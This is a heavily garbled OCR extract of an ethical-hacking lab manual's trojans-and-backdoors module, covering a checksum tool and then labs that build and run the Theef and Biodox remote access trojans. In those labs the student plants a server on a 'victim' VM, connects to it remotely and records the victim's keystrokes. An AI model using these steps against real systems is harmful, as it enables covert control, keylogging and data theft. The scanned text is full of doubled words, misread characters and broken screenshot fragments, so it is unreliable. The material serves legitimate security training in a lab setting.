[ Ih^al192 Ih^al192 (3 (3)) D H«v«l2S6(4) pa panama
152(4) C hav.11152 □hav.l2S6
Qry«nd2* rf*?(25«
L n p em em d l M 1 4»?(164> 4»?(164>
Q nh i* l*a?(S12)
[julbm f wr(W wr(W
Q 1 b» b» 0 [ _| _| * Qtlu2(2M| mefru2 128(4 8(41 1 I I1nefru2 I1nefru2 128(8) »«rffu?2%W »«rffu? 2%W
1 |h«vaU92(5) r) |h »h | |np*mdl28
I havaC24Q) ~|» K« h r pr
Hath: File
Dt\CB4-Too(>'CEH.3Module 06 T1cyans and BackdooisSFiles and Folder Integrity Che cke\fso rrtfron tend•1.S.S.1Vftadmexa
■_y j a
:3 Fi *
f i LJ
Encoding: Base16(hexadecim (hexadecimal) al)
v]
.
(~HMAC
Fie ^ D:\CrM-IochvThun D:\CrM-IochvThun1tM-db (P0\C Bt-TM lACBt 4 Lab Prere— rere— 0■ D.'.CB+T0c!s\CEH/8 Lab Prere® ®D:\aH-T D:\aH- T 0cl5\CEH-e lab Prerc-
<|
111
0 oc(s\CEH/S Lab Prer e_ TocisxCEH/S lab Prere_ £3 t>\CFH-TocisxC ji j D:\CH4-Tocte\C H4-Tocte\C£!!-(• (•<€Lab Prere_ S t D\CEH D\CEH Tocb\Cil fv6 Lab Prere_ 4J0.\CEH-Toob vCB+^ Lab Prere_ ^D'.CTH-TochSCEH<€ ^D'.CTH-TochSCEH<€ lab Prert— - j[>\C£H-TochvClHv j[>\C£H-TochvClHv6 lab Prere_ | >
-
Log
Wrr \1le \1le Mlpy/ltumfe 1c. .rfc«1jr
FIGURE 8.41: FsumFiontEnd files list.
40. Click Generate Generate ch ecksum files. files. The progress bar shows the progress percentage percen tage comp c omplete lete for the t he hash h ash tiles tiles generated. Fsum Frortend v1.5.5.1 Fium Fiontend a LZ Tools LZ Tools : H 1 Cakuiatehashes
Mrihodk (196 )
]h*al160G)
[ te ,*160:4}
Ted II ( |K^^t224«4» I fep Verifychecksum14es 14es - 11»U : £ Generat Generatee checksum checksumf! _]np«m«£i 6 Options 14a? (256) (256) About
[ havtim (5 (5))
I j 23
r «
I n ppee md md l2£]
I *»2GS4)
□ havall 60 (5) □ h v.l2S6(3)
3 •ndS Qrehsdi
* 02 )512(
H]haval192 )5( )H haval2S6 )4(
r !- - *. ! * dbm
r lsoc6»
□ h av av*1192(4) □ hav«l2S6(S)
□ pjw*2 Q*h»0
C]haval192 [5) I |npemd12 |npemd1288
U*•“1 *•“1
5ncfru2128 5ncfru2128f41 I Isnefru2 Isnefru2 128(8)
□ K* 4122431
0 *»*
^ npr nprmdl mdlfcO fcO [!***2C224J ?nrfru2 256fi
Hash |
File
Q Autoruns will will display a dialog with a button that enables you to re• launch Autoruns with administrative rights
D:\CEH-Tools'C EH.3f .lcd u e 06Trcj ans ard Backdcois'sRIes and Folder Integrity CheckeAfsu mfronte nd-'.5.5 .lMtadm e £ >
13 F |
| E£j E£j y
Enco Encodin ding: Base 16(h (hex exad adec ecim imal al)) ~v] □HMAC □HMAC
Fie th\CB MocHvThum*>vdb (SPD.CtM-Tooh\CtH^ Lab Prere0■ D ‘.CEHT 0cls\CEH/S Lab Prert_ O D:\CtH-TooH\CtH D:\CtH-TooH\CtHve ve Lab PrgrgB 0 .aH-IooH\CIH4 Lab LabPr« Pr« f_ ^ 0:\CfH.Too»5SCfHv« lab Prert_ D\CIH IeeWvC(M/fl lab Prcrc E0 .\C lH- Ieo
FIGURE 8.4 8.42: 2: FsumFiontEnd FsumFion tEnd Generate checksum file files. s.
CEH L ab Manual Page 487 487
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
1
Fsum Frontend *27% Ir
Ku n fantcnd a •1 . Too• Too•* * W C«k C«k uul4 l4l* l*h h Mh Mh ««1 1 1 N ■
ltwH 6O0 ) 4 )2 )2 224 4 ))•• ^
File
) S*
I twval1«>( al1«>(4)
lhavaH60 lhavaH60(5) (5)
[ h* aM92(J)
r * WV4 22 4IS) r [ _ 1* p emd l«
1 h«v#l2 St>
r |4) [ i mi wmi m
_ J« h h
shM? 064)
C vLa .V.
l*w?(S1?)
r
Wfis
<
□ h«v«H92 (4) (4) □ h .v .l 2S6 (S) □ ihnO ihnO Wffru212«(41
|h«val1M fS) n!h«h —|nprmdl2 8 |«h*1 Iinf#ru2 1?8 (8)
h*r«B24 31 Jilh«h liprmdlM W#ru22 KM
&. y.. ,.CtsktopvTtst.UX Encoding: Ba.e 16
O You can also use the -e command-line option to launch initially launch Autoruns with administrative rights
J
iMalhodbtWKt
~}md/ ; (9.J Vwif, Vwif, Lhw.Uun.t4c, -•jj 6«nwj:«th*ckium 1i □ ;••cl ;••clii Op tio tionn * :..j 3 About
I I
1 X
File D:\CEM-1oc :1vThuu bvd b I^D.CfcH-ToctsvCEH/ * Lab Prtf S■ D:\CB+Toc!s\C D:\CB+Toc!s\CB+
nd5 B16B0289... C482F590 4C029WF4C029WFJ40E83IC
53 D'.CfcH-1octs\C£H/S octs\C£H/SLib Preffc_ fc_ 3 DACEH-Toc*s\C&+/* Lab Prcre_ j i, D:\CB4-Tock\C£R.« Lab Lab Prrrr_ D:\CEH-Toc(s\C£Hv 6 L«bPrere— £)DA\CFH-Toc^CFH-eHbPrerc_
007C8321007C8321D22FF2CC... 3B85A 3B85A96A... C783050E7A7741C269A3S127BA6FMA7 | E8ECEDSA... 08*2202-
□ hmac |
-
j- , Log Re mdS: 1 Ex Extcuton:
C:'U»*S\Admi n««rjw<\0 «ktop\Testt«t D41DeCDS»0CKGa13®09OGICFW2r£ (XkOCfcOOCOI
Rc II <1
ft'CEH-Too• ?‘T hunb^. db
1p, llurr i'f lOU'tffcXgF
FIGURE 8.4 8.43: 3: FsumFrontEnd progre progress ss o f hash files. files.
41. Th e followi fo llowing ng is die list of o f 111d5 tiles after comple co mpletion tion..
& CEH-To CEH-Tools ols are also located mapped Network Drive (Z:) of Virtual Machines
FIGURE 8.4 8.44: 4: FsumFrontEnd list of hash files. files.
Lab An alysis alysis Analyze and document the results related to die lab exercise. Give vour opinion on your target’s target’s security security posture postur e and exposure diroug d iroug h public and free information. information.
CEH L ab Manual Page 488 488
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
P L E A S E T AL A L K TO T O Y O U R I N S T R U C T O R I F Y O U H A VE VE Q U E S T I O N S RELATED TO THIS LAB.
Questions 1. Scenario: Alice wants to t o use TC P View to keep an eye 011 external connections. However, sometimes there are large numbers of connections with a Remote Address of "localliost:####". These entnes do not tell Alice anything of interest, and the large quantity of entnes caused useful entries entries to be pushed out of view. view. 2. Is there there any way to filte filterr out the the "l oc allio st:# ## #" Remote Address Address entries? 3. Evaluate wh at are the other othe r detail detailss displayed displayed by “autoruns” “auto runs” and an d analyze analyze the working o f autonuis tool. 4. Evaluate the the other options of Jv l6 Power Powe r Too l and analyz analyzee the result. result. 5. Evaluate Evaluate and list list die algonduns diat Fsu mF rontEn d supports. supports. Internet Connection R equired □
Y es
0 No
Platform Supported 0 C la l a ss ss rroo o m
CEH L ab Manual Page 489 489
0 iL ab s
Etliical Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Crea Creating a Server Using Using the th e Theef Th eef Tbeef is a Windon Windon •s-base •s-based d applicatio application n for bo both the client and and server end. The The The Theef ef server server is a vims vims that that yon yon install install onyonr victim's victim's com compu pute ter, r, and the T h e f client client in in nhatyou then use to control the vims. ICON
KEY
/' Valuable information S
Test your ______ ___ _ knowledge ____
*
Web exerc exercise ise
£Q! Workbook Wo rkbook review
Lab Scenario A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-ofservice (DDoS) attacks, 01 it may be used to install additional Trojans or other forms of malicious software. For example, a backdoor Trojan may be used to install a downloader 01 dropper Trojan, which may 111 turn install a proxy Trojan used to relay spam or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the affected system and thus potentially lead to further compromise by other attackers. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, stealing valuable data from the network, and identity theft.
Lab Objectives The objective of tins lab lab iiss to help students learn to detect Trojan and backdo or attacks. JT Tools Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
The objectives of the lab niclude: ■
Creating a server and testing testing the netw ork for attack
■
Detecting Trojans and backdoors
■
Attacking a netw ork usmg sample Trojan s and docum enting all all vulnerabilities and flaws detected
Lab Environment To carry tins tins out, you need: need:
CEH L ab Manual Page 490 490
Theef tool located at D:\CEH-T00 ls\CEHv 8 Module 06 Trojans and Backdoors\Trojans Typ es\Rem ote A cc es s Trojans (RAT) (RAT)\Th \Thee eef f
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
■
A com puter running Windows Server Server 2012 as host hos t machine
■
A compu ter running Window Server 8 Virtual Machine (Attacker) Machin e (Victim) (Victim) Windows Server 200 8 mnning 111 Virtual Machine
■
A web brow ser with Internet access
■
Administrative Admin istrative privileges privileges to ru runn tools
Lab Duration Time: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as mining die file allocation table on a hard drive. Note: The versions of die created client or host and appearance of die website may
differ from what it is 111 die lab, but die actual process of creating the server and die client is same as shown 111 diis lab.
Lab Task Task s M
TASK
1
Create Server with wit h ProRat
1. Launch Laun ch Windows Server 2008 2008 Virtual Virtual Machine and navigate navigate to Z:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote A cc es s Trojans (RAT (RAT)\ )\The Theef. ef.
2. Double-click Server 2 1 0 .exe to run die Trojan on the victim’s machine. j i j a * T ojans T/oes » denot e Ac:e5s roiars (RAT) » Theef
L ° *° I» I Date modi-i modi-ied ed
I-I Type Type
M S ir ir e
H
I 0 . COOararr.n
Ctontt10.**• Edacrvcr
I j
ciders
210
e>e
pass s rea dn-e .txt
v P|B9B9E P|B9B9EBB BB
1 !■3upx.exe Cemnond Shell ~rw * I ^
JA Defacenent 'rojars ^
Destruave T'co T'coans ans
| . Ebanang Ebanang Trojan Trojanss
Ji E-Mal T ojans FPTrojar £
GUI Trojans Trojans
0
i-rrTFH TPS r )ars
i t ICMP Bcddoor Bcddoor ^ MAC OSX Trojans ^ Proxy Ser\erTrojan: Remote Access “rtge Apocalypse ^
31
Atelie web Rem
k). DarkCorretRAT __ ^
ProRst
Theef
FIGURE 8.1: Windows Server 2008-Theef Folder
3. 11111 the th e Open File - S ecu rity Warning Warning window, click Run, as shown in die following screenshot.
CEH Lab Manual Page 49 491
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Open File - Security Warning The publish er coul d not not be verified run this software?
Name
I]
Are you sure you want to
...emote Access Access Trojans Trojans (RAT)\Theef\Server210.exe (RAT)\Theef\Server210.exe
Publisher Unknown Publisher Type
Application
From
Z:\CEHv8 Module 06Trojans and Backdoors\Trojan... Run Run
Cancel
This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers publishers you trust. How can I decide what software to run
't
FIGURE FIG URE 8.2 8.2:: Windows Server 2008-SecuiityWarning
4. Launch Windows 8 Virtual Machine and naviga navigate te to Z:\CEHv8 Module 06 Trojans and (RAT)\Theef.
5.
Backdoors\Trojans
Types\Remote
Access
Trojans
Double-click Client210.exe to access the victim macliine remotely.
|P. qTT” qTT” 1 | Home « & •
View
Trcjans Types £
Favorites ■
D es es kktt op op £ D o w n lo lo a d s
^
Theef
Ap p licato r t o o k
Share
Theef
v | (j | | Search Theef
v© fi |
c c i p a r a - n .n .n i
iflj E c'1tser\er21 C.exe pc ss.dl l |
readme,tx: readme, tx: "« Scanner.dll Sever2IO.ex6
[1 Documents J ' Music
■ J upx.exe
m
<6 zip.dl zip.dl
P i ct ct ur ur e s
Remote Access Trojans (RAT)
Cl crt2 '0 .ex e j
|
R e c en en t p la la ce ce s
39 Libraries Libraries
Manage
| j V id id eo eo s
Homegroup
f f 1 C o m pu pu t er er tim Local Disk (C:)
V
CEH To T o o ls (\\1 0 .0.0 .0.0..
Net wor k
9 items
1i tem selected S22 KB
FIGURE 8.3: Windows 8-Running Client210.exe
6. 11111 the th e Open File - Se cur ity Warning Warning window, click Run. as shown 111 die following screenshot.
CEH L ab Manual Page 492 492
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Open File - Security Warning The publisher could not be verified . Are you sure you wan t to run this software?
S3
Name:
. . . p e s \R \R e m o t e A c c e ss ss T r o ja ja n s ( R A T ) \ T h e e f \C \C l i e n t 2 1 0 . e x e
Publisher
U n k n o w n P u b l i s he he r
Type
Application
From:
Z : \ C E H v 8 M o d u l e 0 6 T r o j a n s a n d B a c k do do o rs rs N T ro ro j an an s T .. .. .
Run
Cancel
T h i s f i l e d o e s n o t h a v e a v a l i d d i g i t a l s i g n a t u r e t h a t v e r i f ie ie s i t s publisher. You sh ould only run software from publishers you trust. H o w c a n I d e c id id e w h a t s o f t w a r e t o r u n ?
FIGURE FIGUR E 8.4 8.4:: Windows 8-Security W Warning arning
7. The maui window o f Th eef appears, appears, as shown 111 die following following screenshot. 1^
neetv^iu
0
Connect
> Connect
A
Port 6703
FTP
2968
Disconnect
☆
Theef version version 2.10 01/No . ember/2004
FIGURE 8.5 8.5:: Theef Thee f Main Screen Screen
8. Enter En ter an IP address 111 the IP held, and leave die Port and FTP tields as dieir defaults. 9. 111 diis lab we are attacking Windows Server 2008 (10.0.0.13). Click Server 2008. 2008. Connect after entering die IP address o f Window s Server
CEH L ab Manual Page 493 493
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
TT 7Tieef v2 10 Connect
Port
Connect
6703
FTP 2968
Disconnect
A Computer information information
FIGURE 8.6 8.6:: Theef The ef Connecting to Victim Machine Machine
10 10.. N ow ill Windows 8 you have access to view the Windows Server 2008 machine remotely. ro
- h e e fv fv . 2 .1 .1 0
Connect
10.0.0.13
-
Connect
Po r t
6 70 3
FTP
2 96 8
Disconnect
[15:05:31] Attempting connection with 10.0.0.13 [15:05:31] Connection established with 10.0.0.13 [15:05:31] Connection accept ed [15:05:31] [15:05:31] Connected to to transfer port
A
%
•Qj SY
&
Connected to server
FIGURE 8.7: 7: Theef Gained access of Victim Machine Machine
11. 11. To view die compu co mputer ter information, click die Computer icon at die bottom of die window. window. 12. 111 Comp uter Information, you are able to view PC Details. OS Info, Home, and Network by clicking on die respective resp ective buttons. butto ns.
CEH L ab Manual Page 494 494
Etliical Ha ckin g and Cou ntenn easure s Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Computer Information Information
Reply PCDetails received
FIGURE 8.8: 8: Theef Compute! Compute! Information
13. 13. Click die Spy icon to capture screens, keyloggers, etc. of die victim’s machine. p r T Ti Tie ef ef v .2 .2 .1 .1 0 Computer Information Information User name: Administrator Computer name: WIN-EGBHISG14L0 Registered organisation: Microsoft Registered Registered owner: Microsoft Workgroup: [Unknown] A va il ab le mem or y: 56 5 Mb o f 10 22 Mb Processor: Genuinelntel Inte64 Family 6 Model 42 Stepping 7 (3095 Mhz) Display res: 800 x 600 Printer: [Unknown] Hard drives: C:\ (6,186 Mb of 16,381 16,381 Mb free)
PC Det ai ai ls ls
<#] OS OS In In fo fo
^ 5 Ho m e
Network
FIGURE 8. 8.9: 9: Theef Spy
14. Select Keylogger to record die keystrokes ol die victim. 15. 111 the th e Keylogger window, click click die Play butto bu ttonn to recor r ecordd the th e keystrokes.
CEH L ab Manual Page 495 495
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Keylogger [Started]
cv
*j
FIGURE 8.9: Theef Keyloggei Window
16. 16. N ow go to Windows Server Server 2008 and type some text 111 Notepad to record die keystrokes. Keylogger [Started]
[New Text Document.txt - Notepad] HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE} Billy U have been been hacked by the world wor ld famouse f amouse {BACKSPACE} hacker.j[CTRL}{CTRL}{ALT}
*51 tv
©
FIGURE 8.1 8.10: 0: Theef Thee f recorded Key Strokes Strokes
17 17.. Similar Similarly, ly, you can access die details o f die victim’ victim ’s machine by b y clicking clicking die respective icons.
Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s target’s security security posture postu re and exposure diroug d iroug h public and free information.
CEH L ab Manual Page 496 496
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
P L E A S E TA L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B.
T o o l /U /U t il ilit y
I n fo fo rm rm a ti ti o n C o ll l l e ct c t ed e d /O / O b j ec e c ti t i v e s A c hi h i e ve ve d
Output: Theef
Victims machine PC Information Victims machine keystorkes
Questions 1. Is there any way to fal falte terr out ou t the "localhost:# # # # " remote address entrie entries? s? 2. Evaluate the other details details displayed displayed by “autoruns” “auto runs” and analyze analyze the working of the autonins too tool. l. Internet Connection Required
□ Y es
0 No
Platform Supported 0 C la l a ss ss rro o om om
CEH L ab Manual Page 497 497
0 !Labs
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Creat Creating ing a Server Serv er Using the th e Biodox T heef he ef is a W indons based applicationfor app licationfor both both the the client client and server end. end. The Theef Th eef server is a vim v imss that yon install insta ll on on your you r victi victims ms coup!iter, and a nd the The T heef ef client in nhat yon then use to control the virus. ICON
KEY
/' Valuable information Test your knowledge — Web exercise exercise
ca
W orkbook review review
Lab Scenario You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.
Lab Objectives The objective objective of tins tins lab is is to help students learn to detect Trojan and backdo or attacks. The objectives of the lab include: Creating a server and testing the network tor attack Detecting Trojans and backdoors ■
& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
Attacking a netw ork using sample Trojan s and docum enting all all vulnerabilities and flaws detected
Lab Environment To earn tins out, you need: need:
Biodox tool located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backd oors\Trojans Types\GUI Types\GUI Trojans\Biodox Troja Trojan n
■
A com puter runn running ing Windows Server Server 2012 as H ost os t Machine A computer running Window Server 8 Virtual Machine (Attacker) Windows Server 2008
running 111 Virtual Machine Machin e (Victim) (Victim)
A web browser with Internet access Administrative privile privileges ges to nm n m tools
CEH L ab Manual Page 498 498
Etliical H ack ing and C ounterm easures Copyrig Copyright ht © by EC-Cou EC-Council ncil All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Lab Duration Tune: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as mining die file allocation table on a hard dnve. The versions versions of die created created client client or h ost an d appearance of die website may differ from what it is 111 die lab, but die actual process of creating die server and die client is same as shown 111 diis lab. Note:
Lab Task Task s m TASK
1
Create Server with Pro Rat
1. Launch Windows 8 Virtual Virtual Machine and navigate navigate to Z:\CEHv8 Module 06 Trojans and Backd oors\Tro jans Types\GUI Types\GUI Trojans\Biodox Trojan. Trojan.
2. Double-click machine. r
w
BIODO BIODOX X OE Edition .e x e
Ap p licato r t o o k
'
I
1
Hom e
-* )
0
t
to mn die Trojan on die victim’s
S ha ic «
Vie vr
Biodox
M a nage
, ,, n sTy p cs
v
► GUITro GUITr o jan jan s ► Bo co x Tio jen ► Bio d ox ox
v | C, | | Se arch Biodox
© *
.
Jl. Lan g u ag e
Favorites
Pbgns
W Desktop
£. Downloads
; 3 BI3COX CE Edition.e
R Recen ecen t p laces
& MSCOMCTL.OCX
j* MSW1NSOC OCX
39 Libraries Libraries H) Do cu men t?
B
A res.qf g
Music
sewing sewing s.in s.in i
P ic ic t ur ur e s
|§j Videos
FIGURE 9.1: Windows 8-Biodox Contents
3. 111 the Open File - Sec urity Warning Warning window, click Run. as shown in following screenshot. Open File Security Warning The publisher could not be ve verified. rified. Are you sure you want to run this software? Name:
...I ...I Tro jans\B iodox Trojan \Biodo x\BIO DOX OE Edition.exe
Publisher
Unknow n P Publisher ublisher
Type:
Application
From:
Z:\CEHv8 Mod ule 06 Trojans and Backdoors\Trojans T... T...
Run
Cancel
This file does no t have a valid digital signa ture that verifies verifies its publisher. publisher. You sho uld only run software from publishers you trust. trust. How can I decide what software software to run?
FIGURE FIGUR E 9.2 9.2:: Windows 8-Security W Warning arning
CEH L ab Manual Page 499 499
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
4. Select Select yourpreferred language language from die drop-dow drop- dow n list list in die Biodox main window: 111 diis lab we have selected English. Biodox Open Source Edition
£ 3 commun A passwor
man ag e keyboar msn sett
Og settings ________ information 0 system information (5 1 ; fin man ag er y commands f 1 cap tu re server properties local tools |w co n tact u s
Co rrectio rr ectio n
Poet
f f Cermet Cermet tkn
6061 6061
g T r a ns ns f er er
6 6 62 62
Bs
6663
5
6 6 64 64
W e bC bC a m
ua
User Name
Computer ...
Admin
Coded By Who! | w h o @ t i k k y s o f t . c o m
Sta tus : Ready...
--------
>
--
-
FIG URE 9.3: 9.3: Windows 8-Biodox main window language language selection
5. No w clic click k die Server Editor butto bu ttonn to build a server as shown sho wn 111 die following screenshot. Biodox Open Source Edition
□ . -----------
- Fake Error Message
00
3 commenfcaton £ passwords manage fifes keyboard
$ settings manage' systenr systenr r 1fo m a o x 1
Adress:
| Test Message
|
Message Icon :
©
O
r Victim Na
fin mwaoff gp> commands
Name:
\J^ capture 5j strver nropprtiet
Connection; | 6 6 6 1
[ Connection connection Delay
QUvf^l
local tools M contact us
| Screen Capture;
Tran sf s fer: er:|666? |666?
| webcam Capture:
O Windowo n dowo
O Temp Temp
|6663
|6664
|
|
c#< . for conrwtioi
-Regetry Settings K*y: mssrs:
Correction
Error*
| biodox biodox wa s here
IP/[*S-
5 P msn settjnos
; Msg Title
0
S yy8 8 te te m 32 32
Server Mode (•> Gizli Mod
O Yardyrr Yardyrr Moou Moou
s
Px t
*3 Connection
6561
S Tran sfer s fer
6562
?? Screen
6563
5 W e bC bC a m
6 5 64 64 Admin
| Operatin ... | Cpu
Status : Read/...
| Ram
Coentry Coentry
active / deactive deactive status
FIGURE 9.4: Windows 8-Security Warning
6.
CEH L ab Manual Page 500 500
111 Server Editor options, enter a victim’s IP address in die IP/DNS field; in diis lab we are using Windows Server 200 8 (10.0.0.13). Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
7. Leave die rest of die settings at dieir defanltd; to build a server click click die butt on. Create Server button. Note:
IP addresses may ditter 111 your classroom labs. labs. Biodox Open Source Edition | H
Server Editor
7
p a ss ss wo wo rd rd s manage files files keyboard
-IP/DfsS -IP/Dfs S -------
msn settings settings maTage s ys ys te te nn- 1 nfo mato n
^
----------
□ 0 0
!13 commuucaton £
Adr ess:
110.0.0 13|
Na m e:
|v ictim
Msg Title :
|ErfQH
Message :
|biodox w as here
I
Message Icon :
©
■» f i r m a n a g er er commands capture
2 j se rve r prop ert ies
Connectio n:
Delay — 1- Connection Delay
[666 [66611
| Screen Ca ptu re:
Tran sf s fer: er:|6662 |6662
| webcam Capture:
O
O
-Registry Settings
Windows
0
Temp
Key :
mss mssrrs3 s3 2
Vak je:
mssr mss rs3 s3 2 .ex e
O Yardyn Yardyn MoCu
Port
? 5 C on on ne ne ct ct io io n
6 56 56 1
® Tr Tra n sf e r
65 6 2
?? Screen
6563
S W eb eb C am am
6564
5 y st st e m 32 32
■Server Mode © Gizli Gizli Mod
Vetim Marne
|
|
Dday|i0n **C
■*f k>:al tools ' ) contact us
Correction
[6663 [6663
[6664
0
J_U£J
IP Adress
UserN arre
Compute r...
Admin
Operati n...
Cpu
Status : Ready...
Ram
Coui try
create server
FIGURE 9.5: Bodox Main Screen
Server.exe
tile will be created 111 its default directory: Z:\CEHv8 Module 06
Trojans and Backd oors\Tro jans Types\GUI Types\GUI Trojans\Biodox Trojan. Trojan. A p p l i c at at o r T oo oo ts ts
|
|
Ho Home
5 0 - ♦g
View
Share
« Tr cjans Types ►
GUITrojons ►
"S’ © D-odox Trojcn ►
Biodox
v|C |
| Scorch Scorch Biodox Biodox
J4 Language
-Z Favorites E
Bi od ox
Manage
M P l j 9
D e sk sk t op op
t
BIOCOX Cb fcd!t 10 n.e
4 Downloads
j p U in w
‘k\l Recent places
MSCOMCTL.OCX gMS\A1NSCK.0CX
Libraries 0
£ 1 e s . g f
D o cu cu m en en ts ts
J'' Music B
P ic ic tu tu re re s
0
V id id eo eo s
p i/ [ server.ex server.exe") e") ft 5ertingj.ini -
FIGURE 9.5: Bodox services
9. No w switch to Windows Server 2008 2008 Virtual Virtual Machine, and navigate navigate to Z:\CEHv8 Module
06
Trojans\Biodox Trojan Trojan
CEH Lab Manual Page 50 501
Trojans
and
Backdoors\Trojans
Types\GUI
to mil die server.exe tile.
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
’ r 0)or» "ypea - GUI Trojon* - 3 odo
edit
ools
/1eA
C rg»m :e ~
»
a
I*I
tnodfi«d
I*I Typ*
Ms.. I•I
I i^Ptugns
D o cu cu n cn cn t s
%1 Pictu-es
4 Ib 1 X O ^ O r & 4 t o r . e t e
R j Music
p
More
&
(__ O pen
Fa/orite Links
f
i tt tt J i F -
ie p
Leetre Leetre
<£ m 5c <* c t .. o c x
»
MSWINSCK.C O
i^serangs.r
i. . . . ^
.*jm-r.
3iodo!c Trojan J. Botox JA Language J4 Pogne
FIGURE 9.6: Bodox server.exe
10. Double-click server.exe 111 Windows Server 2008 virtual macliine, and click Run 111 die Open File - Se cur ity Warning Warning dialog box. Open File File - Security Warning The publisher could not be verified. Are you sure you want want to run this software?
E
Name: .. .pes\GUI Trojans'B iodox Tr0jatVf310d0x\server.exe Tr0jatVf310d0x\server.exe Publisher: Type:
U n k n o w n P u b l i s h er er
Application
From: From: Z:\CEHv8 Module Module 06Troja ns and Backdoors Backdoors \Troja n...
Run
•
tgV
Cancel
This This file file does does not have a valid valid dig digit ital al signa signatur ture e that veri verifi fies es its its publisher. You should only run software from publishers you trust. How can I decide what software to run*
FIGURE 9. 9.7: 7: Run the tool
11. 11. No w switch to Window s 8 Virtual Macliine Macliine and click die active/deactive bu ttonn to see die con connec nected ted machines. s t a t u s butto
CEH L ab Manual Page 502 502
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Biodox Open Source Edition Server Editor
□ ■------------
-Fake Error Message Message —
□Q S
r S commcnicaton
pas swo rds manage ftes
j keyboard keyboard fla msn settjn os os settings ma-iage O s y st st e m n f o matr>n
Adress:
Msg TlUc ;
|br- or
Messa ge:
[biodox [biodox w
Message Icon :
10.0.013
- Vctim Vctim flame
.#.• finmanaoer jj commands [_jj capture
N am am e :
properties 3 server properties
Ivic
Connec tion: [6661 [6661
r co n n ectio ect ectiioo n D elay -
D^ayjiOI
A local tools
1ee.
“\) contact us
| webcam Capture:
O
O
|6663
|6664
|
|
connectioi
-R -Reg eg etr etry y Sewin g sKey:
| Sae en Cap tjre :
Tran sf s fer: er:|66s? |66s?
mssrs:
Windows
0
Temp
S y st st e m 32 32
•serv er Mo M o d e© Gizli Gizli Mod
O Yardyrr Yardyrr Mocu Mocu
Pxt
Connection
S Co n nectio nectionn
6561
Transfer
6962
® Saeen ® Web Cam Cam
6 5 63 63 6564
Vctom Vctom Name
IP Adress
User Narre
Con>putcr...
Admin
Operatin ...
Cpu
Ram
S t a t u s : S e t t i n g s s a v e d a n d s e r v e r c r e a te te d (
Coentry
active / deac tive status
FIGURE 9.8: Bodox open source editior
12. 12. After getting connected connec ted you can view view connected connecte d victims victims as shown 111 die following screenshot. Biodox Open Source Edition
(D0I
----------
0 0
3 c o m mc mc n ic ic a to to n 2 ' pas swo rds manage fles keyboard
O
msn settinos settings maTage s y s te te r r n ft ft y m a t o n
Adress:
10.0.013
Msg Titl e:
[Errofl
Message :
|biodox wa s here
Message Icon ;
©
V
Co n n ectio n : |66 |66 6 1
| Saee n C Cap ap tu re:
-----
